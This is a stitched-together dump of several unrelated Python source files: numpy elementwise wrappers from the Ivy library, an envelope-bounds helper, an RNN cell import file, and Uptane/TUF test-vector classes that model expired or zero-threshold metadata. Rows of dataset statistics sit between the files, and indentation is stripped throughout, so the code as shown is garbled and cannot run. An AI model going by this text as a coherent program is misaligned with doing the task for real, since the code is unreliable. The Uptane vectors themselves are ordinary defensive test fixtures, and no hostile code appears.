@_handle_0_dim_output
def exp(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.exp(x, out=out)
@_handle_0_dim_output
def expm1(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.expm1(x, out=out)
@_handle_0_dim_output
def bitwise_invert(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.invert(x, out=out)
@_handle_0_dim_output
def bitwise_and(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
else:
dtype = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(dtype)
x2 = x2.astype(dtype)
return np.bitwise_and(x1, x2, out=out)
@_handle_0_dim_output
def equal(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.equal(x1, x2, out=out)
@_handle_0_dim_output
def greater(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.greater(x1, x2, out=out)
@_handle_0_dim_output
def greater_equal(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.greater_equal(x1, x2, out=out)
@_handle_0_dim_output
def less_equal(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.less_equal(x1, x2, out=out)
@_handle_0_dim_output
def multiply(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if hasattr(x1, "dtype") and hasattr(x2, "dtype"):
promoted_type = np.promote_types(x1.dtype, x2.dtype)
x1, x2 = np.asarray(x1), np.asarray(x2)
x1 = x1.astype(promoted_type)
x2 = x2.astype(promoted_type)
elif not hasattr(x2, "dtype"):
x2 = np.array(x2, dtype=x1.dtype)
return np.multiply(x1, x2, out=out)
@_handle_0_dim_output
def ceil(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
if "int" in str(x.dtype):
ret = np.copy(x)
else:
return np.ceil(x, out=out)
if ivy.exists(out):
return ivy.inplace_update(out, ret)
return ret
@_handle_0_dim_output
def floor(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
if "int" in str(x.dtype):
ret = np.copy(x)
else:
return np.floor(x, out=out)
if ivy.exists(out):
return ivy.inplace_update(out, ret)
return ret
@_handle_0_dim_output
def sign(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.sign(x, out=out)
@_handle_0_dim_output
def sqrt(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.sqrt(x, out=out)
@_handle_0_dim_output
def isfinite(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.isfinite(x, out=out)
@_handle_0_dim_output
def asin(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.arcsin(x, out=out)
@_handle_0_dim_output
def isinf(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.isinf(x, out=out)
@_handle_0_dim_output
def asinh(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.arcsinh(x, out=out)
@_handle_0_dim_output
def cosh(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.cosh(x, out=out)
@_handle_0_dim_output
def log10(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.log10(x, out=out)
@_handle_0_dim_output
def log(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.log(x, out=out)
@_handle_0_dim_output
def log2(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.log2(x, out=out)
@_handle_0_dim_output
def log1p(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.log1p(x, out=out)
@_handle_0_dim_output
def isnan(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.isnan(x, out=out)
@_handle_0_dim_output
def less(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.less(x1, x2, out=out)
@_handle_0_dim_output
def cos(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.cos(x, out=out)
@_handle_0_dim_output
def logical_not(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.logical_not(x, out=out)
@_handle_0_dim_output
def divide(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if isinstance(x1, np.ndarray):
if not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
else:
promoted_type = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(promoted_type)
x2 = x2.astype(promoted_type)
return np.divide(x1, x2, out=out)
@_handle_0_dim_output
def acos(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.arccos(x, out=out)
@_handle_0_dim_output
def logical_xor(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.logical_xor(x1, x2, out=out)
@_handle_0_dim_output
def logical_or(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.logical_or(x1, x2, out=out)
@_handle_0_dim_output
def logical_and(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.logical_and(x1, x2, out=out)
@_handle_0_dim_output
def acosh(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.arccosh(x, out=out)
@_handle_0_dim_output
def sin(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.sin(x, out=out)
@_handle_0_dim_output
def negative(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.negative(x, out=out)
@_handle_0_dim_output
def not_equal(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.not_equal(x1, x2, out=out)
@_handle_0_dim_output
def tanh(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.tanh(x, out=out)
@_handle_0_dim_output
def floor_divide(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
else:
dtype = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(dtype)
x2 = x2.astype(dtype)
return np.floor_divide(x1, x2, out=out)
@_handle_0_dim_output
def sinh(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.sinh(x, out=out)
@_handle_0_dim_output
def positive(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.positive(x, out=out)
@_handle_0_dim_output
def square(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.square(x, out=out)
@_handle_0_dim_output
def remainder(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
else:
dtype = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(dtype)
x2 = x2.astype(dtype)
return np.remainder(x1, x2, out=out)
@_handle_0_dim_output
def round(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
if "int" in str(x.dtype):
ret = np.copy(x)
else:
return np.round(x, out=out)
if ivy.exists(out):
return ivy.inplace_update(out, ret)
return ret
@_handle_0_dim_output
def bitwise_or(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
else:
dtype = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(dtype)
x2 = x2.astype(dtype)
return np.bitwise_or(x1, x2, out=out)
@_handle_0_dim_output
def trunc(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
if "int" in str(x.dtype):
ret = np.copy(x)
else:
return np.trunc(x, out=out)
if ivy.exists(out):
return ivy.inplace_update(out, ret)
return ret
@_handle_0_dim_output
def abs(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.absolute(x, out=out)
@_handle_0_dim_output
def subtract(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if hasattr(x1, "dtype") and hasattr(x2, "dtype"):
promoted_type = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(promoted_type)
x2 = x2.astype(promoted_type)
elif not hasattr(x2, "dtype"):
x2 = np.array(x2, dtype=x1.dtype)
return np.subtract(x1, x2, out=out)
@_handle_0_dim_output
def logaddexp(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
else:
dtype = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(dtype)
x2 = x2.astype(dtype)
return np.logaddexp(x1, x2, out=out)
@_handle_0_dim_output
def bitwise_right_shift(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
else:
dtype = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(dtype)
x2 = x2.astype(dtype)
return np.right_shift(x1, x2, out=out)
@_handle_0_dim_output
def bitwise_left_shift(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
else:
dtype = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(dtype)
x2 = x2.astype(dtype)
return np.left_shift(x1, x2, out=out)
@_handle_0_dim_output
def tan(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.tan(x, out=out)
@_handle_0_dim_output
def atan(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.arctan(x, out=out)
@_handle_0_dim_output
def atanh(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.arctanh(x, out=out)
@_handle_0_dim_output
def atan2(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
else:
dtype = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(dtype)
x2 = x2.astype(dtype)
return np.arctan2(x1, x2, out=out)
# Extra #
# ------#
@_handle_0_dim_output
def minimum(x1, x2, *, out: Optional[np.ndarray] = None):
return np.minimum(x1, x2, out=out)
@_handle_0_dim_output
def maximum(x1, x2, *, out: Optional[np.ndarray] = None):
return np.maximum(x1, x2, out=out)
@_handle_0_dim_output
def erf(x, *, out: Optional[np.ndarray] = None):
if _erf is None:
raise Exception(
"scipy must be installed in order to call ivy.erf with a numpy backend."
)
return _erf(x, out=out)
| 27.643299
| 85
| 0.651898
| 2,101
| 13,407
| 4.013327
| 0.070919
| 0.220944
| 0.071158
| 0.113852
| 0.875949
| 0.868596
| 0.863259
| 0.863259
| 0.782021
| 0.737192
| 0
| 0.031131
| 0.199746
| 13,407
| 484
| 86
| 27.700413
| 0.754777
| 0.011561
| 0
| 0.609065
| 0
| 0
| 0.010345
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.172805
| false
| 0
| 0.016997
| 0.113314
| 0.385269
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
4c6bb7f9cfec52c9d9155f3fb6e1fce711858dcf
| 270
|
py
|
Python
|
envelope.py
|
snghojeong/balance-adviser
|
3c5811c62ff794575281ed2d060805fd157022b7
|
[
"MIT"
] | 1
|
2020-01-31T12:18:30.000Z
|
2020-01-31T12:18:30.000Z
|
envelope.py
|
snghojeong/balance-adviser
|
3c5811c62ff794575281ed2d060805fd157022b7
|
[
"MIT"
] | null | null | null |
envelope.py
|
snghojeong/balance-adviser
|
3c5811c62ff794575281ed2d060805fd157022b7
|
[
"MIT"
] | 1
|
2020-02-08T12:51:04.000Z
|
2020-02-08T12:51:04.000Z
|
def envelopeHiBounds(valueList, wnd):
return envelopeBounds(valueList, wnd, 0.025)
def envelopeLoBounds(valueList, wnd):
return envelopeBounds(valueList, wnd, 0.025)
def envelopeBounds(valueList, wnd, ratio):
return valueList.ewm(wnd).mean() * (1 + ratio)
| 30
| 50
| 0.737037
| 32
| 270
| 6.21875
| 0.40625
| 0.301508
| 0.39196
| 0.321608
| 0.512563
| 0.512563
| 0.512563
| 0.512563
| 0.512563
| 0
| 0
| 0.038793
| 0.140741
| 270
| 8
| 51
| 33.75
| 0.818966
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d5bec02a9804972ff143ecb35cc2f2b64820070e
| 178
|
py
|
Python
|
rnn_cell/__init__.py
|
h4ste/cantrip
|
33bce1378586f4c8c00315883e03296848109845
|
[
"MIT"
] | 2
|
2020-03-26T05:07:07.000Z
|
2020-06-19T13:27:57.000Z
|
rnn_cell/__init__.py
|
h4ste/cantrip
|
33bce1378586f4c8c00315883e03296848109845
|
[
"MIT"
] | null | null | null |
rnn_cell/__init__.py
|
h4ste/cantrip
|
33bce1378586f4c8c00315883e03296848109845
|
[
"MIT"
] | 3
|
2018-09-14T02:39:09.000Z
|
2021-02-22T22:28:32.000Z
|
from rnn_cell.ran_cell import RANCell, RANStateTuple
from rnn_cell.ran_cell import VHRANCell
from rnn_cell.gru_cell import LayerNormGRUCell
from rnn_cell.rhn_cell import RHNCell
| 35.6
| 52
| 0.876404
| 29
| 178
| 5.103448
| 0.413793
| 0.189189
| 0.297297
| 0.189189
| 0.324324
| 0.324324
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095506
| 178
| 4
| 53
| 44.5
| 0.919255
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
91108ce7879bd3803cbe8c116fe9207ac4dcb419
| 104,601
|
py
|
Python
|
tuf_vectors/uptane.py
|
xcheng-here/tuf-test-vectors
|
e7f42a23321376a51faac361f23b7f4a4a66092d
|
[
"MIT"
] | null | null | null |
tuf_vectors/uptane.py
|
xcheng-here/tuf-test-vectors
|
e7f42a23321376a51faac361f23b7f4a4a66092d
|
[
"MIT"
] | null | null | null |
tuf_vectors/uptane.py
|
xcheng-here/tuf-test-vectors
|
e7f42a23321376a51faac361f23b7f4a4a66092d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import re
from os import path
from tuf_vectors.metadata import Target, Delegation, Role, SKIPPED_DELEGATION_NAME
from tuf_vectors.step import Step, DEFAULT_TARGET_NAME, DEFAULT_TARGET_CONTENT, DEFAULT_DELEGATION_NAME, MISSING_DELEGATION_NAME
class Uptane:
CLASS_SUFFIX = 'Uptane'
'''2-tuple of (Director, Image Repo)'''
STEPS = []
def __init__(self, **kwargs) -> None:
output_dir = kwargs.get('output_dir', None)
if output_dir is None:
raise ValueError("Missing kwarg 'output_dir'")
output_dir = path.join(output_dir, self.name())
kwargs['output_dir'] = output_dir
self.steps = []
for idx, (director_step, image_step) in enumerate(self.STEPS):
args = kwargs.copy()
args.update(step_index=idx)
image_step = image_step(uptane_role='image_repo', **args)
director_step = director_step(uptane_role='director', **args)
self.steps.append((director_step, image_step))
@classmethod
def name(cls) -> str:
n = cls.__name__
if n.endswith(cls.CLASS_SUFFIX):
n = n[:-len(cls.CLASS_SUFFIX)]
n = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', n)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', n).lower()
else:
raise ValueError('Class name needs to end in "{}": {}'.format(cls.CLASS_SUFFIX, n))
def persist(self) -> None:
for (director_step, image_step) in self.steps:
director_step.persist()
image_step.persist()
def meta(self) -> dict:
'''Used to indicate if this update should pass/fail'''
meta = {'steps': []}
for director_step, image_step in self.steps:
meta['steps'].append({
'director': director_step.meta(),
'image_repo': image_step.meta(),
})
return meta
class SimpleUptane(Uptane):
'''The most basic happy case for Uptane.'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorRootZeroThresholdUptane(Uptane):
'''The director has a threshold of zero for the root role.'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
UPDATE_ERROR = 'IllegalThreshold::Root'
ROOT_KWARGS = {
'root_keys_idx': [4],
'root_threshold': 0,
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorTargetsZeroThresholdUptane(Uptane):
'''The director has a threshold of zero for the targets role.'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
UPDATE_ERROR = 'IllegalThreshold::Targets'
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_threshold': 0,
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoRootZeroThresholdUptane(Uptane):
'''The image repo has a threshold of zero for the root role.'''
class ImageStep(Step):
UPDATE_ERROR = 'IllegalThreshold::Root'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'root_threshold': 0,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTargetsZeroThresholdUptane(Uptane):
'''The image repo has a threshold of zero for the targets role.'''
class ImageStep(Step):
UPDATE_ERROR = 'IllegalThreshold::Targets'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'targets_threshold': 0,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoSnapshotZeroThresholdUptane(Uptane):
'''The image repo has a threshold of zero for the snapshot role.'''
class ImageStep(Step):
UPDATE_ERROR = 'IllegalThreshold::Snapshot'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'snapshot_threshold': 0,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTimestampZeroThresholdUptane(Uptane):
'''The image repo has a threshold of zero for the timestamp role.'''
class ImageStep(Step):
UPDATE_ERROR = 'IllegalThreshold::Timestamp'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'timestamp_threshold': 0,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorRootExpiredUptane(Uptane):
'''The director has expired root metadata'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'ExpiredMetadata::Root'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
'is_expired': True,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorTargetsExpiredUptane(Uptane):
'''The director has expired targets metadata'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'ExpiredMetadata::Targets'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'is_expired': True,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoRootExpiredUptane(Uptane):
'''The image repo has expired root metadata'''
class ImageStep(Step):
UPDATE_ERROR = 'ExpiredMetadata::Root'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'is_expired': True,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTargetsExpiredUptane(Uptane):
'''The image repo has expired targets metadata'''
class ImageStep(Step):
UPDATE_ERROR = 'ExpiredMetadata::Targets'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'is_expired': True,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoSnapshotExpiredUptane(Uptane):
'''The image repo has expired snapshot metadata'''
class ImageStep(Step):
